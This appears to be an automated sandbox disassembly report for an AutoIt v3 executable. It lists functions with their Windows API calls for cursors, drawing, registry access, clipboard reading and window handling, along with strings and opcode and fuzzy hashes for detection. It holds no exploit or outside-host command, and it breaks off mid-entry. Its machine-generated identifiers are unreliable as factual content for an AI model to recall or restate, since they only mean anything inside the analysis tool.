                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                                                    • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                                    • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                                                                    • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                                    • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                                                                    Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsnicmp
                                                                                                                                                    • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                                                    • API String ID: 1038674560-3360698832
                                                                                                                                                    • Opcode ID: 65fc6129c27a0e5b9038aaf471882948dbc31deeea1a7772db1e4d1b886b8c94
                                                                                                                                                    • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                                                                                    • Opcode Fuzzy Hash: 65fc6129c27a0e5b9038aaf471882948dbc31deeea1a7772db1e4d1b886b8c94
                                                                                                                                                    • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                                                                                    Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00430773
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00430803
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00430833
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00430863
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00430887
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Cursor$Load
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1675784387-0
                                                                                                                                                    • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                                                    • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                                                                    • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                                                    • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                                                                    Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                                    • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                                                                    • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                                                                    • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                                                                    • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                                                                    • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                                                                    • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1582027408-0
                                                                                                                                                    • Opcode ID: 2ef0f4abd11e064f748c4b34313f5c0fe44a91a6cb010614a33e037737a88e84
                                                                                                                                                    • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                                                                    • Opcode Fuzzy Hash: 2ef0f4abd11e064f748c4b34313f5c0fe44a91a6cb010614a33e037737a88e84
                                                                                                                                                    • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                                                                    Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseConnectCreateRegistry
                                                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                    • API String ID: 3217815495-966354055
                                                                                                                                                    • Opcode ID: ff115ad2982b2ac011ce19291b1e7fd7fbb968081a7030b714478602d8e116a6
                                                                                                                                                    • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                                                                    • Opcode Fuzzy Hash: ff115ad2982b2ac011ce19291b1e7fd7fbb968081a7030b714478602d8e116a6
                                                                                                                                                    • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                                                                    Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00456746
                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                                                                    • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                                                                    • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                                                                    • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                                                                    • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                                                                    • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                                                    • String ID: ($,$tooltips_class32
                                                                                                                                                    • API String ID: 225202481-3320066284
                                                                                                                                                    • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                    • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                                                                    • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                    • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                                                                    Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                                    • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                                    • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                                    • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 15083398-0
                                                                                                                                                    • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                                    • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                                                                    • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                                    • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                                                                    Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                                                                    • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                                                                    • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                                                    • String ID: @$AutoIt v3 GUI
                                                                                                                                                    • API String ID: 867697134-3359773793
                                                                                                                                                    • Opcode ID: 00a77f97e553fd72a6cbe10c1c6169f4dfcf88cf398ac727729fd0aea825547b
                                                                                                                                                    • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                                                                    • Opcode Fuzzy Hash: 00a77f97e553fd72a6cbe10c1c6169f4dfcf88cf398ac727729fd0aea825547b
                                                                                                                                                    • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                                                                                    Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                    • API String ID: 1503153545-1459072770
                                                                                                                                                    • Opcode ID: fdee644b799a79cc51680871cdb4e33d86fc0af8b03a6c9e9b934ea10f9254c8
                                                                                                                                                    • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                                                                                    • Opcode Fuzzy Hash: fdee644b799a79cc51680871cdb4e33d86fc0af8b03a6c9e9b934ea10f9254c8
                                                                                                                                                    • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                                                                                    Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsicoll$__wcsnicmp
                                                                                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                                                                                    • API String ID: 790654849-32604322
                                                                                                                                                    • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                                                                    • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
